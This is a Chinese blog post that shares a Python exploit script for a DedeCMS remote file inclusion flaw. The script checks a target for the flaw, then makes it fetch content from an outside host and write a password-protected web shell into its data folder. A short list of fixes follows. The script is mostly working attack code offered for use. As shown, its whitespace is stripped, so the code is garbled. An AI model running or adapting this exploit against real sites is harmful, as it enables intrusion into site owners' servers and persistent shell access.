HI,大家好,废话不多说,直接上干货:最新python织梦dedecms远程执行脚本,以及织梦cms漏洞漏洞,脚本,视频教程相关的问题,主要就是想给大家提供一个思路分享给大家,毕竟也是经过一系列总结过的哈!
织梦CMS是使用最多的CMS之 一,但是漏洞也非常多。分享一款python写的织梦远程文件包含漏洞。修复此漏洞方法,请见文章底部。
织梦CMS漏洞代码
#!/usr/bin/envpython
#coding=utf-8
#Joseph(小续)
importrequests
importsys
importre
defmain():
try:
url="http://"+sys.argv[1].strip('http://')
exceptIndexError:
print'''
poc:dede.py[url]http://www.baidu.com/[/url]
'''
payload="/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.php"
urlpoc=url+payload
code=requests.get(urlpoc).status_code
ifcode==200:
printu"恭喜存在此漏洞"
printu"Ongoingattacks--->>>>>"
exploit(url)
pass
else:
printu"sorry漏洞正在挣扎"
pass
defexploit(url):
urlpoc=url+"/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.php&updateHost=https://www.tuiedu.org/"
htmlcontent=requests.get(urlpoc).content
Probe=re.compile(r'存在')
ifProbe.findall(htmlcontent):
printu'''
ver:getshell成功
shell:url+/data/tang3.php?a=0密码为:c
'''
pass
else:
printu"请看远程地址是否已经不可用"
pass
if__name__=='__main__':
main()
修复方法
1、建议安装完成后,删除(改名)install文件夹。
2、给data文件夹改名,或者移动位置。
3、到织梦后台,升级到最新的版本
4、官方网站下载最新补丁包手动更新到最新版本。
5、不用谢!
相关专题
Python
2020-11-19 192
Python专题为了整理了关于Python学习资料,包含Python入门视频教程,Python视频教程,Python电子书,Python手册下载等等.
-
Python一键安装卸载工具V1.0
[2022-07-21] -
Python+HTML随机点名抽奖源码模板
[2021-11-01] -
[阿里云盘]python爬虫验证码识别破解教程
[2021-09-19] -
Python百度贴吧一键自动签到脚本
[2021-06-10] -
Python语法整理合集pdf电子书
[2021-04-23]
好了,这篇文章就到这里吧,希望你看到这篇文章以后能有所启发,阅读完最新python织梦dedecms远程执行脚本【详细介绍】感觉学到很多知识,那就帮忙点个赞吧!也可以收藏寂寞网哈!
本文发布者:站长老油条,不代表寂寞网立场,转载请注明出处:https://www.jimowang.com/p/20516.html
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 jimowangmail@126.com 举报,一经查实,本站将立刻删除。
